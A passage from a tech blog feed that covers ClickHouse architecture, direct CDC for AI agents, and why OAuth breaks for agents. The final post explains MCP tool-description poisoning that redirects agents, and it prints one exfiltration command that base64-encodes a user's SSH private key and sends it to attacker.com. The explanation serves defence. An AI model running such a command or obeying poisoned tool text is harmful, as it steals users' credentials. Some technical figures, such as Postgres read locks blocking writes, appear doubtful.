Where I want pushback: if you've run a careful before/after measurement on AI tools at your team or company, what did you find? Especially the boring middle case — the one where it's modest, complicated, and doesn't fit the hype or the doom narrative.

If you're an engineer and you're scared right now

Two practical things I'll say with confidence.

One: stop measuring your job security by the noise. The noise — executive quotes, layoff headlines, doom Substacks — is downstream of business pressures that have very little to do with your actual marginal value. Your value as an engineer is set by your team's outcomes, not by the AI narrative cycle.

Two: bet on the skill premium going up, not down. The compression case I described is bad for engineers in the middle who haven't yet picked up the higher-leverage skills — system thinking, deployment judgment, agent orchestration, the integration work I keep writing about. It is good for engineers who do. That premium is not going away. If anything, it's getting steeper. Aim there.

I am not telling you to ignore the layoffs. They are real and they hurt real people. I am telling you the framing matters. If you internalize the "AI is eating my job" story without examining it, you're going to make worse decisions about where to invest your time. The honest version of the picture — labor is compressing, the top tier is doing fine, the middle is squeezed — leads to better choices than the panic version does.

Why We Didn't Converge: ClickHouse's VLDB Paper and the Architecture Agents Actually Need

Anil Kurmi — Sun, 19 Apr 2026 08:28:56 +0000

The moment ClickHouse writes CPU code for your query

You run SELECT category, COUNT(*) FROM events GROUP BY category against 100 million rows. On most databases, the engine walks a bytecode interpreter row by row, dispatching through a switch statement for every tuple. ClickHouse does something else. It takes your specific aggregation, hands it to LLVM, and generates native x86-64 instructions for this exact query. Then it runs them.

The difference is 2 seconds versus 12 seconds. Same hardware, same data, same SQL. Six times faster, because the CPU is executing code written for this GROUP BY, not code written to handle any possible GROUP BY.

The ClickHouse team published their first VLDB paper on April 14, 2026, titled "Lightning Fast Analytics for Everyone." Buried in section 4 is a detail that reframes a decade of analytical-database design: JIT compilation for aggregations was in the first commit in 2016. Not added later as an optimization. Not a recent flex. It was there on day one, because the founders believed interpreters were the bottleneck and compilers were the fix.

This post is about what that paper reveals, why Snowflake and Databricks quietly walked away from true HTAP, why AI agents are spawning 500+ database branches in Lakebase, and how I'd actually design a data platform in 2026.

The 5-minute skim

What the VLDB paper reveals: ClickHouse is not just "fast Postgres." It is four decisions stacked: LSM-style MergeTree storage, vectorized execution on batches (not rows), LLVM JIT for GROUP BY and multi-key sort, and 90+ file format integrations. Remove any one and the performance story collapses.

Default recommendation: If you are building analytics today and already have an OLTP system, do not converge. Split. Send CDC from Postgres into ClickHouse. This is what Snowflake + Databricks + CockroachDB have all effectively endorsed by abandoning HTAP.

Where this breaks: Sub-second freshness with strict transactional consistency across OLTP and OLAP. If an AI agent needs to read an uncommitted order from the last 50 milliseconds and aggregate it against 3 years of history in the same query, composable struggles. That is where Oracle Unified Memory Core, TiDB HTAP+vector, and Databricks Lakebase are betting.

Key trade-off: Composable wins on cost, flexibility, and scale. Converged wins on latency and developer experience for agent workloads. Pick based on whether your consumers are humans or agents.

Why is this the week to talk about data architecture?

Four things landed within seven days and they tell one story.

April 14 — ClickHouse VLDB paper. The first peer-reviewed publication of the internals. Not a blog post. A 12-page VLDB paper with benchmarks, design rationale, and the admission that most of what makes ClickHouse fast was decided in 2016.

April 7 — ClickHouse 26.3 release. 27 features, 40 performance optimizations. Async inserts are now the default. JOIN reordering extended to ANTI, SEMI, and FULL joins. Sharded Map Storage gives 2-49x lookup speedup. Materialized CTEs are real. And WebAssembly UDFs via Wasmtime, which means you can write user-defined functions in Rust or Go and ship them as Wasm.

April 2026 — Databricks Lakebase GA follow-up. Lakebase hit GA in February 2026. By April, the blog post that matters is the one about database branching. AI coding agents are creating 4x more databases than humans. Average production branch depth is 10. Some teams run 500+. Every pull request gets its own isolated Postgres instance with copy-on-write storage.

April 2026 — "Data Lakehouse Architecture 2026." The Medium piece that crystallized the hot/warm/cold pattern. RisingWave materialized views for millisecond freshness, Iceberg for 30-60 second warm tier, Iceberg for cold historical. Kafka topics and Iceberg tables are converging into the same object via StreamNative's Lakestream.

The through-line: the industry stopped pretending one database does everything, and started designing for the fact that agents, not humans, are now the dominant query generator.

What are the four pillars of ClickHouse?

The VLDB paper is organized around four layers. I will keep each brief because the depth is in the paper itself.

1. LSM-style MergeTree storage. Data lands as immutable sorted parts. Background merges compact them. Primary keys are sparse (one entry per 8192 rows by default), which keeps the index in memory even for trillion-row tables. Compression runs column-by-column, so a timestamp column with low cardinality compresses to a few bits per value.

2. Vectorized execution. ClickHouse does not process rows. It processes blocks of 65,536 values at a time. Every operator — filter, aggregate, join — is written to consume and emit these blocks. This means modern CPUs get to use SIMD instructions, branch predictors stay hot, and cache lines do not thrash. It is the difference between calling std::vector::push_back 100 million times and calling memcpy once.

3. JIT compilation via LLVM. This is the trick from the opening. For GROUP BY aggregations and multi-key sorts, ClickHouse emits LLVM IR, compiles it to native code, and caches the result. The payoff scales with aggregation complexity. Simple COUNT(*) sees 2-3x. Multi-column GROUP BY with expressions sees 6-10x. The 2s vs 12s number is from the paper's own benchmark on 100M rows.

4. The integration layer. 90+ file formats. Parquet (with ALP encoding now landing in Arrow 58.2), ORC, Avro, JSON, CSV, native formats from half a dozen other systems. S3, GCS, Azure Blob, HDFS, Kafka, RabbitMQ, Postgres CDC, MySQL CDC. The thesis is that analytics does not live in one system, so the engine must read from everywhere. This is what lets you point ClickHouse at Iceberg tables today and Delta Lake tomorrow without migrating data.

Pull one pillar out and the story breaks. LSM without vectorization gives you a slow log-structured store. Vectorization without JIT gives you Presto. JIT without the integration layer gives you a fast system nobody can feed. The VLDB paper's argument is that all four must coexist.

The agent queries both sides. It hits Postgres for "what is the current state of order 1234" and ClickHouse for "how does this user's behavior compare to the last 90 days of cohort X." One reasoning loop, two stores. That is the composable pattern.

Why did Snowflake and Databricks pivot away from HTAP?

Five years ago the pitch was "one database for everything." Snowflake would handle analytics and operations. Databricks would be the lakehouse that also ran transactions. Both companies quietly walked back that claim.

Snowflake launched Unistore in 2022 and has since de-emphasized it. The Snowflake 2026 narrative is openly about Iceberg interop and letting customers use external engines. They figured out that analytical workloads and transactional workloads want different physical layouts, different consistency models, and different resource profiles. Trying to serve both from one engine means serving both badly.

Databricks shipped Lakebase — and Lakebase is Postgres. Not a columnar engine pretending to be transactional. A real Postgres fork with copy-on-write storage and branching. The Databricks message is now: use the lakehouse for analytics, use Lakebase for OLTP, and let Unity Catalog bridge them. That is composable, not converged.

The pattern that won: Postgres → CDC or ClickPipes → ClickHouse. CockroachDB made this official with their April 2026 ClickHouse webinar, where the recap explicitly endorses the split architecture for agentic AI workloads. The reason is physics. A row-store with MVCC and a column-store with LSM merges cannot share a storage engine without one of them being worse at its job.

What did the fintech learn the hard way?

A fintech I worked with in 2024 tried to skip this lesson. They built what they called a "unified platform" on Postgres — transactions and analytics in the same database, because "we will deal with scale when we get there."

They got there. By early 2024 they were processing billions of events per day. The analytics team wrote a dashboard query that did a seven-way join across orders, users, merchants, and three audit tables. It took 45 seconds. During those 45 seconds, the query held read locks on the orders table. Order processing — the actual revenue-generating path — slowed down. At peak hours, orders were queueing for 200ms, then 800ms, then timing out.

They tried the usual escape hatches. Partitioning orders by date — still row locks. Materialized views — 30-minute refresh intervals, which meant the dashboard showed stale data. Read replicas — replication lag drifted to 2+ hours during heavy analytical queries because the replica was saturated applying WAL.

They split. Postgres stayed the OLTP store. Debezium captured CDC into Kafka. ClickHouse consumed Kafka and materialized the analytical model. Three weeks of engineering.

The numbers after the split:

Analytics query: 45s → 800ms (56x faster)
Order processing P99: back to 40ms
Storage cost: dropped, because ClickHouse compressed 6 months of analytical data into less disk than 2 weeks of raw Postgres tables took. Typical compression ratios were 8-12x for event data with repeated categorical columns.

The lesson: converging OLTP and OLAP in one engine is seductive because it looks simpler. The simplicity is a loan. You pay it back with interest the first time analytics and transactions fight for the same locks.

Is database branching really Git for data?

Databricks Lakebase shipped database branching in February 2026, and by April the usage data is striking. Their own post reports that AI coding agents are creating 4x more databases than human developers. Average team has 10 active branches. Some production setups run 500+ branches deep.

Here is why this matters. When a human opens a PR, they usually test against a shared dev database or a seeded fixture. When an AI agent opens a PR — and agents now open dozens per day per engineer — it needs isolation. Two agents running migrations against the same database will step on each other. So every PR gets its own branch. Copy-on-write means the branch is cheap: it shares pages with the parent until you write, then only the diffs are stored.

This changes the dev workflow in three ways:

CI becomes stateful. Your test database is not reset between runs. It is forked from production (scrubbed), mutated during tests, and discarded. Bugs that only manifest against real data shapes surface earlier.
Migrations get tested for real. You run the migration against a branch that looks like production. If it locks tables for 20 minutes, you see it in CI, not at 3am.
Rollback is instant. A bad deploy? Fork the pre-deploy branch and point the app at it. You do not restore from backup. You switch a pointer.

The 500+ depth number is the one that stopped me. That is an agent spawning branches of branches of branches, each representing a hypothesis it is testing. It is a different shape of computation than humans do, and it is what infra has to support now.

What is the Lakehouse 2026 pattern?

Three tiers, each with a clear job.

Hot tier: RisingWave materialized views. Millisecond freshness. Streaming SQL against Kafka or Pulsar topics. You define a materialized view; it updates incrementally as events land. Query latency is sub-100ms. Use this for dashboards that must be live and for agent loops that react to events in real time.

Warm tier: Iceberg with streaming writes. 30-60 second freshness. This is where Kafka topics and Iceberg tables are merging. StreamNative's Lakestream treats them as one object — you produce to Kafka, you query Iceberg. Equinox, Flink, or RisingWave handle the conversion. This tier is for "recent but not real-time" — last hour of orders, last day of sessions.

Cold tier: Iceberg historical. Partitioned, compacted, cheap. Years of history. Query engines (Trino, Spark, ClickHouse, DuckDB) all read the same Iceberg tables. Storage cost dominates and it is S3-cheap.

The reason Iceberg is eating Delta Lake's lunch for streaming workloads comes down to partition evolution. In Delta, changing a partition scheme requires rewriting metadata. In Iceberg, partition evolution is first-class — you evolve the spec and old data keeps its old partitioning while new data uses the new. For streaming systems where you might shard by minute and then later shard by hour, this is the difference between "we migrate over a weekend" and "we do not migrate at all."

The other Iceberg advantage is multi-engine. Delta is Spark-native — other engines support it, but Spark is the reference. Iceberg was vendor-neutral from day one: AWS, Google, Snowflake, Dremio, and ClickHouse all treat it as a first-class citizen.

Delta still wins on one thing: change data feed. Delta CDF is mature; Iceberg's equivalent (incremental reads) is less battle-tested. If your use case is "give me exactly the changes since version N," Delta is still the safer choice.

How should I think about the trade-offs?

Three live debates, in prose because tables lie about nuance.

Composable versus converged. Composable is Postgres plus ClickHouse plus CDC. Converged is Oracle Unified Memory Core, TiDB HTAP+vector, or Databricks Lakebase. Composable wins on cost (each engine does one job well), on scale (you can shard them independently), and on vendor choice. Converged wins on latency for agent workloads that need to correlate fresh OLTP state with historical OLAP in one query, and on operational simplicity (one system to run, not three). My rule: if your primary consumer is humans writing dashboards, go composable. If it is agents making decisions, evaluate converged — but benchmark first.

ClickHouse versus Snowflake. ClickHouse is open-source, self-hostable, and its cost at petabyte scale is an order of magnitude below Snowflake. Snowflake is managed, has better SLOs out of the box, has deeper integrations with BI tools, and does not require you to run compactions or worry about merge pressure. If you have a small data team and a lot of budget, Snowflake. If you have a strong infra team and a lot of data, ClickHouse.

Iceberg versus Delta Lake. Iceberg wins on partition evolution, multi-engine support, and vendor neutrality. Delta wins on change data feed and Spark-native optimizations. Both are converging — Delta is adding Iceberg compat, Iceberg is improving CDC. If you are starting today with streaming writes, pick Iceberg. If you are deep in the Databricks ecosystem, stay on Delta. Do not try to mix them in one table.

When should I split and when should I converge?

Split (composable) if:

Your analytical queries run longer than 5 seconds on your OLTP store.
You are seeing lock contention between analytics and transactions.
Your storage cost is dominated by analytical data retention.
You have more than one analytical engine in the picture (BI tool + ML training + ad-hoc).
Your dev team is comfortable running CDC and a second data store.

Converge (HTAP-ish) if:

Your agents need sub-100ms correlation between fresh writes and historical aggregates.
Your data volume is low enough that one engine fits.
Your ops team is small and cannot run two stores.
You have strict transactional requirements across analytical reads (rare but real in finance and healthcare).

The honest answer for most teams in 2026 is split. The composable stack is mature. CDC tooling (Debezium, Fivetran, ClickPipes) is boring-reliable. ClickHouse is open-source and fast. Iceberg is vendor-neutral. The convergence story is real but it is still early — Lakebase is GA but young, Oracle Unified Memory Core is new, TiDB's vector integration is evolving.

Five things to take away

ClickHouse is fast because of four decisions, not one. LSM storage, vectorized execution, LLVM JIT, and 90+ integrations. Read the VLDB paper before you build your own.
Do not converge OLTP and OLAP in 2026. Snowflake and Databricks walked away from HTAP for a reason. The fintech war story — 45s to 800ms after splitting — repeats in every company that tries.
Postgres → CDC → ClickHouse is the boring-reliable pattern. Debezium, ClickPipes, or Fivetran for the pipe. ClickHouse for analytics. Postgres for transactions. This works at every scale I have seen.
Database branching changes CI. If your team uses AI coding agents, Lakebase or Neon-style branching is no longer optional. Budget for 10 branches per engineer and plan for depth.
Pick Iceberg over Delta for new streaming workloads. Partition evolution and vendor neutrality are the two features you will need in year three. Delta keeps its edge only if you are all-in on Databricks.

Event-Driven Agents: Why Direct CDC Just Killed the Kafka-Debezium-Kafka Stack

Anil Kurmi — Sun, 19 Apr 2026 08:28:07 +0000

It's 2:47 AM. A fraud detection agent wakes up, polls the transactions REST endpoint, sees nothing unusual, and goes back to sleep for 5 seconds. At 2:47:01, a card is swiped in Berlin. At 2:47:03, a contactless tap lands in London. At 2:47:05, a high-value online purchase clears from a residential proxy in Singapore. The agent's next poll fires at 2:47:06. By then the pattern is already three transactions deep, the money is gone, and the agent sees only the final state: "account balance lower than expected." The fraud chain happened in the gaps between polls.

This is the failure mode that made me stop defending request/response as the default integration style for AI agents this week. The same week Kai Waehner published three back-to-back pieces on agentic AI integration, Apache Flink CDC 3.6.0 shipped with sub-second binlog capture, and DBConvert Streams 2.0 removed Kafka from the CDC path entirely. The 2015-2025 assumption — that change data capture requires a broker — is quietly dying. And when it dies, the architecture under AI agents inverts.

The 5-Minute Skim

What changed this week: Direct CDC shipped in multiple products. Flink CDC 3.6.0 reads MySQL binlog and PostgreSQL WAL directly with sub-second latency and YAML-declarative pipelines. DBConvert Streams 2.0 ships PostgreSQL WAL CDC with zero Kafka in the path. Kai Waehner's trinity piece frames event-driven integration as the connective tissue between process intelligence and agentic AI.

Default recommendation: If you're building an agent that makes more than 5 decisions per second against mutable data, default to a streaming substrate (materialized views + CDC), not REST polling. Use REST for drill-down enrichment, not for primary state.

Where it breaks: Multi-consumer federations with 10+ downstream systems, long-retention event archives, cross-org event sharing — Kafka still wins. Direct CDC is a single-pipeline optimization.

Key trade-off: You're trading Kafka's pluggability and retention for one less hop and one less operational surface. For agent-centric, latency-critical, budget-constrained systems, that's the right trade. For enterprise event backbones, it isn't.

Why this week?

Three signals collided. First, Kai Waehner's "Trinity of Modern Data Architecture" (April 1) argues that agentic AI without event-driven integration is just a chatbot with API access — it can't perceive the world continuously. Second, his "MCP vs REST vs Kafka" piece (April 10) reframes the integration debate: these aren't alternatives, they're layers. Third, his CEP piece (April 14) draws the line between pattern matching (Flink) and inference (agents) — and it turns out most people are using the wrong tool on both sides of that line.

Underneath all three, the plumbing got better. Flink CDC 3.6.0 landed March 30. DBConvert 2.0 landed in April. The "Streaming SQL in 2026" Medium piece declared RisingWave and Materialize production-ready for the materialized-view-as-agent-context pattern. The week you could defend "Kafka in the middle of every pipeline" as the default architecture ended somewhere between these releases.

Why does request/response fail for agents?

Three reasons, each with specifics.

Staleness between polls. A REST endpoint returns a snapshot. If your agent polls every 5 seconds, every decision is made against state that is, on average, 2.5 seconds old. For a chatbot recommending a restaurant, that's fine. For a fraud agent watching a card-present sequence, it's the difference between blocking a transaction and refunding one. The fraud chain above happens entirely inside a single poll interval.

Poll load scales with agents, not with events. If 100 agents each poll every 5 seconds, you generate 20 requests per second against your transactions service — whether or not anything is happening. Most of those requests return "nothing new." This is the worst of both worlds: load when idle, and still latency when busy. Event-driven flips it: zero load when idle, immediate wake-up when an event arrives.

No event history, no pattern detection. A poll gives you the current state. It does not give you the sequence that led to the state. Agents that reason about behavior — fraud chains, user intent, supply chain disruption — need the ordered event stream, not the final snapshot. Request/response discards the sequence by construction.

Kai Waehner's argument in the MCP piece is that these aren't opinions; they're structural properties of the integration style. You can work around them (longer-lived websockets, SSE, webhooks), but at that point you've built a worse Kafka.

Visual architecture: what does the new stack look like?

The pre-2026 stack had three hops between the database and the agent. The 2026 stack has two.

The database is the source of truth. A direct CDC reader tails the write-ahead log. The streaming layer either maintains a materialized view (for query-style access) or runs a CEP pattern (for sequence detection). The agent subscribes to view updates or pattern hits, then uses MCP-exposed tools for drill-down. Kafka is optional, not required.

Kafka vs REST vs MCP: what's the hierarchy?

Here's the frame that clicked for me this week. These three are not competitors. They're layers in a stack, each solving a different problem.

MCP is the tool discovery layer. It tells an agent what it can do — what APIs exist, what schemas they take, what side effects they cause. MCP is static metadata plus an invocation protocol. It does not solve "when should I act."

Kafka (or any event log) is the event sourcing layer. It tells an agent what happened, in order, with replay. This is where continuous perception lives. Without an event log — or a direct-CDC equivalent — an agent is blind between invocations.

CEP / Flink is the pattern match layer. It tells an agent when something interesting just happened — a known sequence, a windowed aggregation, a join across streams. CEP is declarative, deterministic, and fast. It's the scalpel between the firehose and the LLM.

REST is the drill-down layer. It answers agent questions like "what are the last 30 days of charges for this specific account?" once the agent has decided it needs to look. REST is pull-based and stateless, which is exactly what drill-down needs.

The mistake is treating them as alternatives. REST-only agents are blind. Kafka-only agents have no pattern detection. CEP-only pipelines can't reason about ambiguous cases. MCP-only stacks have no perception loop. The production pattern is all four, layered: MCP exposes tools, Kafka (or direct CDC) delivers events, CEP filters for known patterns, the agent handles the ambiguous cases, and REST handles drill-down.

What is the CDC simplification revolution?

Here are the numbers that moved this week.

Traditional Debezium path: database → Debezium connector → Kafka topic → Kafka Connect → downstream processor. Three network hops, three operational surfaces, typical end-to-end latency 100-500ms under load, with tail latencies into seconds during rebalances.

Direct CDC path: database → WAL/binlog reader → processor. One network hop, one operational surface, sub-second end-to-end (often under 200ms), no rebalance tail.

The vendors shipping this pattern now:

RisingWave — PostgreSQL-wire-compatible streaming database. Connects directly to Postgres logical replication or MySQL binlog, maintains materialized views, serves SQL queries. No Kafka required for single-pipeline workloads.
DBConvert Streams 2.0 (April 2026) — PostgreSQL WAL CDC with direct sinks. Explicit positioning as "Kafka-free CDC."
Flink CDC 3.6.0 (March 30, 2026) — sub-second binlog capture, YAML pipeline definitions, direct sinks to Paimon, Iceberg, Doris, StarRocks.
Materialize — incremental view maintenance over Postgres CDC.

The architecture changed from three-hop (DB → Debezium → Kafka → processor) to two-hop (DB → CDC reader → processor). You lose Kafka's multi-consumer fan-out. You gain a simpler operational story and a latency budget that fits agent decision loops.

When does this matter? When the agent's decision latency is dominated by the integration path, not the inference. If your LLM call takes 800ms, shaving 300ms off CDC doesn't help. If your agent uses a small local model and the bottleneck is "how fresh is the state," cutting 300ms of broker hop is a 50% latency reduction.

When does CEP win and when does it fail?

Complex Event Processing is the layer most teams skip and then regret. Kai's CEP piece this week draws clean lines.

CEP wins for known sequences. Fraud chains like the Berlin-London-Singapore one above are textbook CEP: three events, temporal ordering, geographic constraint, cardinality threshold. Flink's MATCH_RECOGNIZE clause expresses this in ten lines of SQL and executes in milliseconds. Asking an LLM to watch a stream for this pattern is a waste of tokens and a latency disaster.

CEP wins for predictive maintenance. "Temperature over 80°C for 3 consecutive readings, followed by vibration spike within 60 seconds" — a Flink pattern, not a prompt. Deterministic, auditable, and cheap.

CEP wins for supply chain and e-commerce behavior. "Cart abandonment after coupon view without checkout within 10 minutes" — pattern match territory.

CEP fails for undefined patterns. If you can't write the pattern in SQL, CEP can't match it. Novel fraud modes, emergent user behaviors, anything that requires "this feels off" judgment — that's agent territory.

CEP fails for simple windowed aggregations. If all you need is "count per minute per user," use a streaming SQL TUMBLE window. CEP is overkill.

CEP fails for multi-day, high-cardinality lookback. CEP holds state per pattern match attempt. Trying to match "any anomaly across 100M users over 30 days" blows up memory. Use a feature store and batch scoring instead.

The pattern that works in production: CEP for known patterns at millisecond latency, agent inference for the ambiguous residual. The CEP layer handles 95% of cases cheaply; the agent handles the 5% that needs reasoning.

Trade-offs: Kafka vs direct CDC, streaming vs polling, CEP vs agent

This is the debate, not a table.

Kafka still wins when you have multi-consumer federations. If ten downstream systems each need the order events — analytics, fraud, CRM, warehouse sync, audit, search indexing, ML features, notifications, billing, reporting — Kafka's fan-out is the right answer. Direct CDC means each consumer opens its own replication slot against the database, which Postgres will not love. Kafka also wins when you need long retention (weeks or months of replayable history), when you need cross-system event archives for compliance, and when your ops team already runs it well. Do not rip out Kafka to save one hop if Kafka is doing five other jobs.

Direct CDC wins when you have a single-pipeline agent-centric architecture. Greenfield project, one primary database, one or two consumers, sub-second latency critical, budget-constrained. The operational surface drops from "Kafka cluster + Connect workers + schema registry + Debezium" to "a reader process." The latency drops by 100-300ms. The monthly bill drops by a meaningful chunk.

Request/response wins for low-frequency, drill-down access. An agent that needs "give me the full profile for user 12345" uses REST via MCP. That's the right tool. Streaming is overkill when the access pattern is ad-hoc and infrequent.

Streaming wins above the 5-decisions-per-second threshold. This is the rough break-even I've seen in practice. Below that, REST polling's overhead is tolerable. Above it, the poll load and staleness start dominating the architecture. At 50 decisions per second, streaming is not optional.

CEP wins when the pattern is known, the latency budget is tight, and the cardinality is high. Fraud rules, SLA breaches, threshold-and-sequence alerts. Declarative, auditable, fast.

Agent inference wins when the pattern is undefined, the reasoning is multi-step, or the flexibility matters more than latency. Novel fraud, customer intent, incident triage. Slower (hundreds of ms to seconds), more expensive per decision, but handles cases CEP can't express.

The production architecture layers both: CEP filters the stream for known patterns, the agent handles the residual.

What are the implementation patterns and anti-patterns?

Pattern: materialized view as agent context. The agent doesn't query the operational database directly. It queries a materialized view in a Postgres-wire-compatible streaming database (RisingWave, Materialize). The view is kept fresh by direct CDC. The agent gets point-in-time consistency and sub-second freshness without loading the primary.

Pattern: CEP filter, agent decider. The Flink job runs the known patterns and emits "suspicious event" signals. The agent subscribes to the suspicious-event topic (or materialized view of suspicious events) and does the deeper reasoning. Cheap filtering, expensive reasoning only where needed.

Pattern: agent feedback loop. The agent's decisions (blocked, approved, escalated) become events themselves, fed back into the stream. Over time, the streaming layer can learn which patterns the agent blocks versus approves, and promote high-confidence patterns back into CEP rules. This is how you migrate decisions from "expensive LLM call" to "cheap pattern match" as you learn.

Anti-pattern: polling for agent context. If you find yourself tuning poll intervals to balance staleness against load, you're solving the wrong problem. Switch substrates.

Anti-pattern: LLM as pattern matcher. Asking GPT-class models to watch a Kafka topic for "sequences of three transactions in different cities" is burning tokens to do what MATCH_RECOGNIZE does in microseconds. Save the LLM for ambiguity.

Anti-pattern: Kafka because Kafka. If you have one producer and one consumer and sub-second requirements, a direct CDC pipeline is simpler and faster. Don't add a broker out of habit.

Anti-pattern: direct CDC at enterprise scale without planning replication slots. Postgres has a hard limit on concurrent replication slots. If twelve teams each want their own slot, you need a fan-out layer — which is exactly what Kafka is for. Know your scale before you rip out the broker.

Actionable takeaways

Audit your agents' integration style this week. Count how many poll REST on a timer. For each, ask: would this agent detect a multi-step sequence that spans the poll interval? If no, flag it for streaming migration.
Pilot direct CDC on one greenfield pipeline. Pick the lowest-risk new agent workload, put RisingWave or Flink CDC 3.6 in the path, skip Kafka. Measure end-to-end latency and compare to your Debezium baseline.
Map your integration stack to the MCP/Kafka/CEP/REST layering. If any layer is missing or doubled-up, that's technical debt. Most teams are missing the CEP layer and double-using REST.
Write three CEP patterns before your next agent project. Fraud sequence, SLA breach, user behavior funnel. If you can express them in Flink SQL, CEP handles them. Everything that doesn't fit becomes agent scope.
Build the feedback loop. Every agent decision should be an event on the stream. Without this, you can't migrate decisions from LLM to CEP as confidence grows, and your agent costs don't come down.

The Agent Identity Crisis — Why OAuth Breaks at Machine Speed

Anil Kurmi — Sun, 19 Apr 2026 08:27:09 +0000

"Only 10% of organizations deploying AI agents have governance in place. Yet 91% are already using them." — RSAC 2026

80 million+ enterprises introduced a new identity-bearing risk surface with zero controls. This is the week the bill came due.

What happened on March 31?

Late on March 31, 2026, a maintainer of Axios — the HTTP client that 150 million+ downstream projects rely on every week — pushed two new versions to npm: axios@1.14.1 and axios@0.30.4. Minutes later, a hidden dependency inside those releases started phoning home to an attacker-controlled endpoint.

The maintainer hadn't been phished. He hadn't reused a password. He had MFA enabled. He had a hardware key. And none of it mattered.

For the previous two weeks, a North Korean group Microsoft Threat Intelligence tracks as UNC1069 had been building an alternate reality around him. A cloned Slack workspace. AI-generated deepfake video calls from a fake colleague. A fake LinkedIn profile that matched a real contact in his graph. On March 29, through that social channel, the maintainer opened something he shouldn't have on his developer machine. UNC1069 harvested a valid, unexpired npm session token from his browser storage and walked straight past MFA.

By April 1, Microsoft had the attribution. By April 3, Microsoft Security Response Center was publishing CVE-2026-32211: a CVSS 9.1 missing-authentication flaw in the Azure MCP Server. By April 15, Cloudflare had rushed Managed OAuth for agent-ready apps into general availability. In between, Ox Security disclosed a systemic flaw in MCP itself, and OWASP released its first-ever Top 10 for Agentic Applications, peer-reviewed by over 100 experts.

Four events. Seventeen days. One through-line: OAuth, as we know it, was never designed for agents. And agents are here.

5-Minute Skim

The convergence. Agent adoption hit 91% of enterprises before governance hit 10%. MCP — the protocol everyone is wiring agents through — has no built-in auth. Azure's reference implementation shipped without auth (CVE-2026-32211). 5.5% of public MCP servers already contain poisoned tool descriptions. A single session-token theft compromised a package with 150M weekly downloads.

Default recommendation. Stop issuing long-lived agent tokens. Migrate agent-to-service calls to RFC 8693 Token Exchange. Bind tokens to the agent's public key via DPoP (RFC 9449). Wire CAEP so revocation propagates in seconds. Treat MCP servers as hostile code.

Where it breaks. OAuth2 assumes a human in the loop, a browser with PKCE, and refresh measured in hours. Agents call each other thousands of times per second, delegate to other agents, and run unattended for days.

Key trade-off. Long-lived tokens (24h-7d) are simpler but create Axios-style blast radius. Short-lived tokens align with CAEP revocation but hammer your IdP. The industry is converging on three tiers: human-initiated actions get 5-60 minute tokens, agent-to-agent hops get milliseconds-to-seconds plus DPoP, and batch jobs get single-purpose scoped credentials.

Why this week?

Three events collided inside a single news cycle, and they're not coincidental — they're the same underlying failure mode surfacing in three places.

April 3 — CVE-2026-32211. Microsoft disclosed that the Azure MCP Server — the reference implementation everyone copy-pastes from — shipped with missing authentication on its management endpoints. CVSS 9.1. An attacker with network reachability could enumerate and invoke registered tools without any credential. This is the auth layer simply not being there.

April 14 — Ox Security's MCP disclosure. Ox published research showing a systemic flaw in MCP's STDIO interface: tool descriptions are injected into the LLM's context, so a malicious description can rewrite the agent's intent. Their scan of public MCP servers found 5.5% already contained poisoned descriptions. With auto-approve enabled, their attack succeeded 84.2% of the time. The ecosystem: 150M+ downloads.

April 15 — Cloudflare Managed OAuth. Cloudflare Access rolled out Managed OAuth for agent-ready apps. The significance isn't the feature — it's the positioning. Cloudflare explicitly framed OAuth2 as insufficient for agentic traffic and shipped a managed layer handling Token Exchange, DPoP binding, and CAEP. When Cloudflare rewrites its own identity story in a week, the industry has moved.

Behind all three: OWASP's Top 10 for Agentic Applications 2026, peer-reviewed by 100+ contributors, lists "Identity & Authentication Failures" and "Tool Poisoning" in the top five. For the first time, AppSec guidelines agree that agent identity is a distinct category.

Why does OAuth break for agents?

OAuth2 was designed in 2012 for a specific world: a human clicks "Allow" in a browser, a web app gets a token, and the token is used to call an API on that human's behalf for the next hour. Every primitive in the spec assumes those constraints.

Agents break every one of them:

No human in the loop. An agent orchestrating at 3 a.m. cannot pop a consent screen. The authorization_code grant is unusable. Teams fall back to client_credentials, which gives the agent its own identity but loses "on behalf of the user" context. Audit trails go dark.

Multi-hop delegation. A planner agent calls a research agent, which calls a code-execution agent, which calls an MCP tool. OAuth has no native model for this. The OBO extension papers over it, but semantics vary across IdPs.

Token lifetimes are wrong at both ends. A 1-hour token is too long for an agent making 10k calls/sec — one leaked token is catastrophic. It's too short for a batch agent running 8 hours; refresh logic leaks into every tool call. OAuth assumes a human-scale cadence that fits neither.

Tokens aren't bound to anything. Bearer tokens mean whoever holds them, owns them. In a browser, that's contained. In an agent mesh where tokens traverse queues, logs, shell subprocesses, and sidecars, bearer semantics are indefensible. UNC1069 proved it: a stolen bearer token bypassed MFA.

Policy enforcement is too slow. Tokens are validated once at issuance. But an agent's context changes mid-task. Without CAEP, the IdP can't say "that token you issued 30 seconds ago? Revoke it now." At human speed, 30 seconds is fine. At agent speed, it's thousands of requests.

No attribute-based scoping. OAuth scopes are coarse strings — read:email, write:files. Agents need context-aware policy: "this agent can read files tagged public from tenant X when invoked by user Y during business hours." That's ABAC, and OAuth has no hook for it.

Taken together, these aren't six small gaps — they're one structural mismatch. OAuth was built for a browser visiting a web app. Agents are neither.

Visual Architecture Model

Here is what agent-native authentication actually has to look like. A human authenticates once; every downstream hop is a token exchange with DPoP binding.

Three properties make this flow agent-native. First, the human authenticates exactly once, with PKCE, in a browser — the one place classic OAuth still works perfectly. Second, every hop after that is an RFC 8693 token exchange, which preserves the chain (subject_token = original user, actor_token = agent in the middle) so audit logs can reconstruct intent. Third, every agent-held token is cryptographically bound to that agent's key via DPoP — theft of the token alone is useless without the private key, which never leaves the agent's enclave.

The MCP supply-chain risk

The MCP (Model Context Protocol) ecosystem is where the agent identity crisis is hottest, because MCP was explicitly designed with auth as an afterthought. Its STDIO transport executes shell commands as tool invocations — which means the tool description the LLM reads and the shell command that runs are separated by nothing but trust.

Ox Security's April 14 disclosure walked through the mechanism. An MCP server registers a tool with a description like "git commit — commits staged changes". The LLM reads that description and invokes the tool. But nothing validates that the underlying shell command matches the description. A malicious server can register a tool described as "list files" and execute curl attacker.com/$(cat ~/.ssh/id_rsa | base64) instead. In agents with auto-approve (which, per OWASP, is the common default), the success rate in Ox's lab was 84.2%.

Their public scan found 5.5% of registered MCP servers already shipping with description/command mismatches — some intentional, some the result of copy-pasted examples from compromised tutorials. The surface area: every organization running GitHub Copilot Agent, Claude Desktop, Cursor, or any of the 150M+ installs across the MCP-aware tool ecosystem.

CVE-2026-32211 is the same disease in Microsoft's reference server: management endpoints with no auth, meaning anyone on the network can register a tool. Tool registration is the supply chain.

